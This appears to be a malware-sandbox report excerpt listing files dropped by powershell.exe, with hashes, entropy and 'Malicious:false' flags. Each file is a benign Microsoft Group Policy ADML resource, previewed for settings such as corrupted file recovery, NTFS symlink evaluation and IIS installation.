                                                                                                                                                                                                        SHA-256:3A5992E2DC42003E6F1547CE4253134CF8C6270DA6F68FCB6E3FA854B07FADE1
                                                                                                                                                                                                        SHA-512:A7BE0B5FF87A6EEBD9A1CCA5F72DF27DD9A1DBEB127ADE55AC80CA10C7A5084EB87ECE4143724E5920057F6E533AE809E551C62E88876CCF8A16FAF8AB8A1358
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted files to one of three states:....Regular: Detection, troubleshooting, and recovery of corrupted files will automatically start with a minimal UI display. Windows will attempt to present you with a dialog box when a system restart is
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2614
                                                                                                                                                                                                        Entropy (8bit):4.778560797244179
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:c4D5FL8golENFW8jxk1tQYY4DXOc3I+4QZHD75LhhAOoXV:RD5FPoWNFWweQD4TV1Zv5LhHoXV
                                                                                                                                                                                                        MD5:85E6DEC7D2E9D6A930AE1A7B4C9E6CE9
                                                                                                                                                                                                        SHA1:A8C71091F223CD0DCDF3AA8AE4A2D6E1888FD69E
                                                                                                                                                                                                        SHA-256:1E5E1B42CFB88B5072DADEB281779586616FC8A3493F66EE17557A19D9ABC27D
                                                                                                                                                                                                        SHA-512:F0076C0E98DE7CBD06723E647B7CF654CF85CE262832321606FCA066B22FC4C70635D183F2E1F8BD77AA9FC99F9EDEE8BF909DD8708AA3C01F0A8164FEEE9D98
                                                                                                                                                                                                        Malicious:false
Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. Documentation says these are optional, but GPEdit does not agree-->.. <displayName>File Revocation Policy Settings</displayName>.. <description>File Revocation Policy Settings</description>.. <resources>.. <stringTable>.. <string id="FileRevocationCategory">File Revocation</string>.. <string id="DelegatedPackageFamilyNames_Name">Allow Windows Runtime apps to revoke enterprise data</string>.. <string id="DelegatedPackageFamilyNames_Help">Windows Runtime applications can protect content which has been associated with an enterprise identifier (EID), but can only revoke access to content it protected. To allow an application to revoke

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1516
Entropy (8bit):4.992519754988731
Encrypted:false
SSDEEP:24:2dgeD5eo8g4t4+3Fbef61yjhZEPaREbCF2LRz8u4tUtTY45y9Qy52fKKnKHPaMfV:cgeD5x8gU8fK8hOaRmC0Rz8u4tYTFynR
MD5:BFBE8A2102D1DAD98FC3B6A7C9D49809
SHA1:D2B7FA51C1458FF163A3A687687BC79615A0950E
SHA-256:DA1FFF29710B8B4D5D3361E38FE64B66D7A39F70AB98D23F02C2F285C7298817
SHA-512:798D71F3589C310441205512EDF99AC939A53BD7A4381BE6908722C9C41B03788AE7BE9D2B59083D7D39E76D9CFA8D7EA1DD4BCFD3800602188A6185C64B6941
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Component name -->.. <string id="Cat_FileShareShadowCopyProvider">File Share Shadow Copy Provider</string>.. Component name -->.... <string id="Pol_EncryptProtocol">Allow or Disallow use of encryption to protect the RPC protocol messages between File Share Shadow Copy Provider running on application server and File Share Shadow Copy Agent running on the file servers.</string>.. <string id="Pol_EncryptProtocol_Help">Determines whether the RPC protocol messagese used by VSS for SMB2 File Shares feat

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
Category:dropped
Size (bytes):5047
Entropy (8bit):4.778189792452432
Encrypted:false
SSDEEP:48:cgeD5x8gm8fK0BR2avs7FFiTs5UXs5Zg3NZRWwzL9oaVdQMxITRnRZ6LutwOXsQU:LeD5pmus7asQsyxVOnJIV
MD5:F1951FB8C3B9EEBE23ABEF5EE23DBA39
SHA1:FBAB4967D796A04FB164024D8C543D676E44BD24
SHA-256:40A867EB9B6B1644CDF87AC77D346485DA153B245603237FA9A76E2C68ACFD4B
SHA-512:9604C7324D2FE2EC3C40D90E0C3747B6BBBF20186F7A6A695D947C9F1FEB727875066CC700C31291BA156C0BA83893917AF4A7BEDC37208D4500B88DF22D9079
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Filesystem">Filesystem</string>.. <string id="NTFS">NTFS</string>.. <string id="SymlinkEvalExplain">Symbolic links can introduce vulnerabilities in certain applications. To mitigate this issue, you can selectively enable or disable the evaluation of these types of symbolic links:....Local Link to a Local Target..Local Link to a Remote Target..Remote Link to Remote Target..Remote Link to Local Target....For further information please refer to the Windows Help section....NOTE: If this policy is Disabled or

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
Category:dropped
Size (bytes):7951
Entropy (8bit):4.723629934992763
Encrypted:false
SSDEEP:96:LeD5pm0w3a/059U9dRz1zAkpsx1zAkWMOUH+fH/s3RpeWCBNTAynMydWcS5Pv0rA:EEVzAT7p67WMF+3s3RV5yMydWz5P0A
MD5:B0E17494D027C66AD4CC97FE5D2E6108
SHA1:D382CFCD7145A738FC23FE78BC925DB11E9C5A42
SHA-256:0144A87B8D59221D8C76B55A64743F6AD72FEC812242669C05421D4D07321383
SHA-512:65256FCD792B464E49B8A04D00442F5B4FC358337E3F6B3DDA4F3B14BA7C460A9825F1D7FF22A2C39FC1A12C188C724C0C82D3FB1A602D193D5F693D8D4335BA
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Fdeploy_Cat">Folder Redirection</string>.. <string id="LocalizeXPRelativePaths">Use localized subfolder names when redirecting Start Menu and My Documents</string>.. <string id="LocalizeXPRelativePaths_Help">This policy setting allows the administrator to define whether Folder Redirection should use localized names for the All Programs, Startup, My Music, My Pictures, and My Videos subfolders when redirecting the parent Start Menu and legacy My Documents folder respectively.....If you enable this policy s

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2163
Entropy (8bit):4.8446705224824
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEThu85fKbISIiSPks6/jvY/wAibISvVviR0OlnIcBV:cgeD5x8gm8fK+oKWkx7v7SmVviBV
MD5:15395250ABFE245E09EDEA1B6537814E
SHA1:BCD13824A7D7E4DDDF9F7F60EEC6149D6F10F1D4
SHA-256:CADF1A1ED7AF5758824AC8A710730356758359E4CF0B61B989B76A3BA9DADFF0
SHA-512:6C4337CD68D38FC32E6AA4BEAB133AEC2E7F4DA435092F7359CAF6859E24B3FC2C6D1D9F19886DEE9F726CF1F3BD993F4FF9F1A9F626024EC593486E75B81216
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ExplorerFramePanePolicies">Explorer Frame Pane</string>.. <string id="PreviewPane">Turn on or off details pane</string>.. <string id="PreviewPane_DropDownList_Show">Always show</string>.. <string id="PreviewPane_DropDownList_Hide">Always hide</string>.. <string id="PreviewPane_help">This policy setting shows or hides the Details Pane in File Explorer.....If you enable this policy setting and configure it to hide the pane, the Details Pane in File Explorer is hidden and cannot be turned on by the

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1897
Entropy (8bit):4.8809825480443285
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKl5wrZqMZDrABpO+ODR5/aAo19ArdFV:LeD5pmLGZqi4kRhaAo10dFV
MD5:85EE206DDBF793929AC0467A02312D46
SHA1:27550C4F8815DF919184B033AD36AD864CD5FA84
SHA-256:9F9F0778ABA650963783D793C7253CA72B4A7CEF436A4E34D4B5AEA6DD65BB95
SHA-512:B76B6D2E2F3B8B4B42CFD8B609EAAAEAC8B974C11D77CA00B5A32980C43EA9F415543D4C081F4E820D58D601A76EA098F01491820CEFD40E2766488923EAF889
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DownloadGameInfo">Turn off downloading of game information</string>.. <string id="DownloadGameInfo_Help">Manages download of game box art and ratings from the Windows Metadata Services.....If you enable this setting, game information including box art and ratings will not be downloaded. ....If you disable or do not configure this setting, game information will be downloaded from Windows Metadata Services.</string>.. <string id="GAMEUX">Game Explorer</string>.. <string id="ListRecentlyPlayed">Turn off

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (486), with CRLF line terminators
Category:dropped
Size (bytes):25531
Entropy (8bit):4.651678772761436
Encrypted:false
SSDEEP:384:3G+fZ/NAlGQpr1EVa+3+O+kDeZCwFBAA5ykHj0Yz0hSxqGq0:W6NAlGQpr2oSDy5PGwPH
MD5:76A8A380A63A9348769B4A94D9EEF57F
SHA1:B20DFDC04FB839A890E83A590020CCF263EB338E
SHA-256:7FCB7F49FCEA58D4CFD70A65394DD7E7FD5404D7E51225FBB212035CEA78DF79
SHA-512:D9F454A57DEE30397CA8233DBD9EBD3E136FBE53B99D34572A04960B6C2785F3B1FECC914B580FA1C033A8952C4C072FF264FAFD1345EB76083B21E3C1482A61
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomLocalesNoSelect">Disallow selection of Custom Locales</string>.. <string id="CustomLocalesNoSelect_Help">This policy setting prevents a user from selecting a supplemental custom locale as their user locale. The user is restricted to the set of locales that are installed with the operating system.....This does not affect the selection of replacement locales. To prevent the selection of replacement locales, adjust the permissions of the %windir%\Globalization directory to prevent the installation of locale

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (301), with CRLF line terminators
Category:dropped
Size (bytes):1487
Entropy (8bit):4.93565859545614
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yczWOV1zWI6+xZAlxP84b6M119Z3icCV:cgeD5x8gm8fKmfg7I1/ZS9V
MD5:721DE72286ED158412B12054999D879D
SHA1:3E9668AD9CE409FC80B008D56BA0C213CEDD2B4B
SHA-256:A87BB0424E1D7DEF0F6D544530A32ABB9ED6D448969FEB8C5985F30E0FD71B65
SHA-512:A35D98E011DB3E0050FE3695F49576E2229F627D8A967907CB28B85A86762FD969D63CB89E4FE692CDA4B4F4211502F37B53C5C97FADC6A205E8174A63A9E285
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProcessTSUserLogonAsync">Allow asynchronous user Group Policy processing when logging on through Remote Desktop Services..</string>.. <string id="ProcessTSUserLogonAsync_Help">This policy setting allows Microsoft Windows to process user Group Policy settings asynchronously when logging on through Remote Desktop Services. Asynchronous user Group Policy processing is the default processing mode for Windows Vista and Windows XP.....By default, Window Server processes user Group Policy settings synchronously.....I

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (772), with CRLF line terminators
Category:dropped
Size (bytes):60292
Entropy (8bit):4.712085259009764
Encrypted:false
SSDEEP:768:eOZhoxHoAJPf9Op1fJDBRLPz5E/tW/4HnQ:eOZ+xIGAlBRLPz5E/8gw
MD5:3EC08BDFFA220598C2FE18E65DC57F55
SHA1:7E91322DA98DAA4F971A0CEEE5589D0AA601A40E
SHA-256:BF01A53E4DD9D9A982152BB2AF4F6B78DB2E6B26D0E3F80D192AC647FAFD3261
SHA-512:ED99C8F50AD90322E3844D63A29E573B6DE5ACA73A1C9111757B8331B6325BE9D9840D3C0945F124E058BDAB07A364360B4ECFEF14CB472487ECF6DBB7A7B606
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ResetDfsClientInfoDuringRefreshPolicy">Enable AD/DFS domain controller synchronization during policy refresh</string>.. <string id="ResetDfsClientInfoDuringRefreshPolicy_Help">Enabling this setting will cause the Group Policy Client to connect to the same domain controller for DFS shares as is being used for Active Directory.....</string>.. <string id="DisableAOACProcessing">Turn off Group Policy Client Service AOAC optimization</string>.. <string id="DisableAOACProcessing_Help">This policy setting p

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (500), with CRLF line terminators
Category:dropped
Size (bytes):133320
Entropy (8bit):4.822585844934633
Encrypted:false
SSDEEP:3072:TaSaHapabacaEa8aqapalasa4aMayauauaSa+awaOaW:Y
MD5:D1A5CF9F95B52D0C47DE6C6BBA860D0A
SHA1:112212D522046D296E4298AD5EEED40429FDAF28
                                                                                                                                                                                                        SHA-256:D79EED1FFB6836C73A921B8BD79195F3787C17CB15CEB9E27D682F27DAEA3AEF
                                                                                                                                                                                                        SHA-512:E79B6906D42A8F62A0D5B942C93C4A0A474DC6D841D7784D3EB49BDE7CA7B02F07E53D1DD2A0EE7D13974F9A9722F1A77A40C9F9A28F1DDF0955E46756F39034
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Group Policy Preference Policies</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="MMC_PrefApplications">Permit use of Application snap-ins</string>.. <string id="MMC_PrefApplications_Explain">This policy setting allows you to permit or prohibit use of Application snap-ins (Application preference item types). When prohibited, no Application preference item types appear when you attempt to create a new Application preference item, and you are unable to do so. This policy setting does not affect existing Application preference items.....If you enable or do not configure this policy setting, you permit use
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (399), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5647
                                                                                                                                                                                                        Entropy (8bit):4.726995944697996
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmkwXl3Bnrvb+st3rnZay5gok2TyV+EJlNifb/j4mRMFW78v/xvJ9xvJ7V:EG+stjZ3gyIzNiz9MFWAn9np
                                                                                                                                                                                                        MD5:3B1AD1ECF110F12067554FA487C740FD
                                                                                                                                                                                                        SHA1:0EE520F7EC886C23F0A431AA690C851B5EB0C5A2
                                                                                                                                                                                                        SHA-256:8DDB25B03AEAC60067CA82F72EDE2B7EBCEB1E48E196BAD69995C052FD2D2E86
                                                                                                                                                                                                        SHA-512:F16103456D09B6385240E7A30FBC9909F0383D1611B08E9E3EB8407BA97E5F462DF7E127E5B8F04842F4A7F54E71D13C30675906624E41CF012AAA6EE06D8731
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HelpQualifiedRootDir_Comp">Restrict potentially unsafe HTML Help functions to specified folders</string>.. <string id="HelpQualifiedRootDir_Help">This policy setting allows you to restrict certain HTML Help commands to function only in HTML Help (.chm) files within specified folders and their subfolders. Alternatively, you can disable these commands on the entire system. It is strongly recommended that only folders requiring administrative privileges be added to this policy setting..... If you enable th
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3089
                                                                                                                                                                                                        Entropy (8bit):4.757831684112995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5J8gmk3TikjDKO5a+A7nQK2N7nCgQ1XlD0J4qXCdCEJaN5Z7aexmFV:LeD5hm4TiADLcXnQvnzUt0JBznFmFV
                                                                                                                                                                                                        MD5:FF9EF4C6BCE28ED5D6C68034CF5FB683
                                                                                                                                                                                                        SHA1:9CD42425C65E031C5D535FD63B8A113FCE81923E
                                                                                                                                                                                                        SHA-256:C121B0C89956299E7EA7212D382E199BDF50F51FE94634740934C56BAC669CAC
                                                                                                                                                                                                        SHA-512:A86DB211B742DA417D886D1C77B22E82B4B25F84C961B7C4ADA3CB64216A35A21DDCD211B50251467E11EA234356516A1245768D5F266DC1F8F346EBC56F2B84
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Online Assistance</displayName>.. <description>Online Assistance</description>.. <resources>.. <stringTable>.. <string id="Assistance">Online Assistance</string>.. <string id="windowscomponents">Windows Components</string>.. <string id="ActiveHelpPolicy_Explain">This policy setting specifies whether active content links in trusted assistance content are rendered. By default, the Help viewer renders trusted assistance content with active elements such as ShellExecute links and Guided Help links.....If you enable this policy setting, active content links are not rendered. The text is displayed, but there are no clickable links for these elements.....If you disable or do not configu
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19360
                                                                                                                                                                                                        Entropy (8bit):4.641124398915221
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:m7xEdYC8St0ugzNQmh2z31TCIXBtbL+jc98MK1X:zLtk27p1MMK1X
                                                                                                                                                                                                        MD5:17CAE97BBE2A02C66C6FBDD54652B33E
                                                                                                                                                                                                        SHA1:2CCB62039419D7D7D93EA8B04D7A3E587D80DC06
                                                                                                                                                                                                        SHA-256:CAB1DD5C4B264CD58F17F3CD2C16775A7ABF379558F7506DD55FC363CA90C656
                                                                                                                                                                                                        SHA-512:3ACB5C95A38AEB54C4FF0DD0735B6C0FEF4536EA22764455D16A90A0CC8A36655AD5E8E1D964429765818E06A15A90AE7AB4AA3EE556746235FA62C074C0B3C6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CertMgr_DisableAutoRootUpdates">Turn off Automatic Root Certificates Update</string>.. <string id="CertMgr_DisableAutoRootUpdates_Help">This policy setting specifies whether to automatically update root certificates using the Windows Update website. ....Typically, a certificate is used when you use a secure website or when you send and receive secure email. Anyone can issue certificates, but to have transactions that are as secure as possible, certificates must be issued by a trusted certificate authority (CA)
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (743), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1408
                                                                                                                                                                                                        Entropy (8bit):4.880333709783744
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y+kZDqGIZ0DafLMezn6FI2gFV:cgeD5x8gm8fKIZDqGTaYeeFcFV
                                                                                                                                                                                                        MD5:426B83EC085AE7511EF7836624778786
                                                                                                                                                                                                        SHA1:510FB2D8410021336EC73B9757A5E1A85FFA902B
                                                                                                                                                                                                        SHA-256:73B3CBE01F0416F6DE28395E5B9AC286C8149D0F46BAB6AE86B6AC4E58B0F803
                                                                                                                                                                                                        SHA-512:DECBFE7A847491E79F7CAD8AF64CDB650F82424CE657D44D8A8E9CF1BDFA413959DFD79349A88E8050EB6EB0715B4792AA2843E613A914C753A9211A07D2BF18
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="IIS">Internet Information Services</string>.. <string id="PreventIISInstall">Prevent IIS installation</string>.. <string id="PreventIISInstall_Help">"This policy setting prevents installation of Internet Information Services (IIS) on this computer. If you enable this policy setting, Internet Information Services (IIS) cannot be installed, and you will not be able to install Windows components or applications that require IIS. Users installing Windows components or applications that require IIS might not r
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (592), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):457561
                                                                                                                                                                                                        Entropy (8bit):4.747379761820279
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:4ShXU4YfsUgEI5zZxU6AECqP68pxJXljJX2G439MYe1t8ob:ZMk43i1t8u
                                                                                                                                                                                                        MD5:10590CE50B19C233DDB6EEC95850C5F4
                                                                                                                                                                                                        SHA1:0E8CD5C92654B4655E317521164FE17548AC9284
                                                                                                                                                                                                        SHA-256:9775D601260260CA0BDB805FD89AA5C3C126B8706458404A2405711DFD708647
                                                                                                                                                                                                        SHA-512:9DEC09DF0555B8106AE2D1FE2C6405672A995687EB03B8382D0A23EF36FD273980FC15D4194142107FAFC59A148039BE7DF0FB22A4F9FC1153C06BE04AE4D18A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="11.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="InternetCPL_Advanced_Accessibility">Accessibility</string>.. <string id="InternetCPL_Advanced_International">International</string>.. <string id="InternetCPL_Advanced_Security">Security</string>.. <string id="InternetCPL_Connections">Connections Page</string>.. <string id="InternetCPL_Content">Content Page</string>.. <string id="InternetCPL_Content_Certificates">Certificates</string>.. <string id="InternetCPL_General_Appearance">Appearance</string>.. <string id="InternetCPL_Gener
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (309), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1426
                                                                                                                                                                                                        Entropy (8bit):4.787912997643585
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8p/L1u10pKiuruwuNez27BshruwlOALVIVriFV:cgeD5x8gm8fKb2gzp7Be7OA5OOFV
                                                                                                                                                                                                        MD5:386AFC1D42FDA5DA7B89C46B35C02635
                                                                                                                                                                                                        SHA1:44DC5FF2A570253D5AE1C755604DFFE11EF58022
                                                                                                                                                                                                        SHA-256:3930ADC5CC37AC32F2C02C1C3F288CAD45F18DDB232D5226B78E9CF7632014C2
                                                                                                                                                                                                        SHA-512:32AFFF54025D2A4C313228C41DFF6C2858877F5B0341F1950C822021DD2D13F1C6B70A43761EECB204AAB83762FC48BC6548B4D40A3746B5AC11C8240C973786
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PreventHandwritingErrorReports">Turn off handwriting recognition error reporting</string>.. <string id="PreventHandwritingErrorReports_Explain">Turns off the handwriting recognition error reporting tool.....The handwriting recognition error reporting tool enables users to report errors encountered in Tablet PC Input Panel. The tool generates error reports and transmits them to Microsoft over a secure connection. Microsoft uses these error reports to improve handwriting recognition in future versions of Windows
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (554), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10440
                                                                                                                                                                                                        Entropy (8bit):4.663520278145665
                                                                                                                                                                                                        Encrypted:false
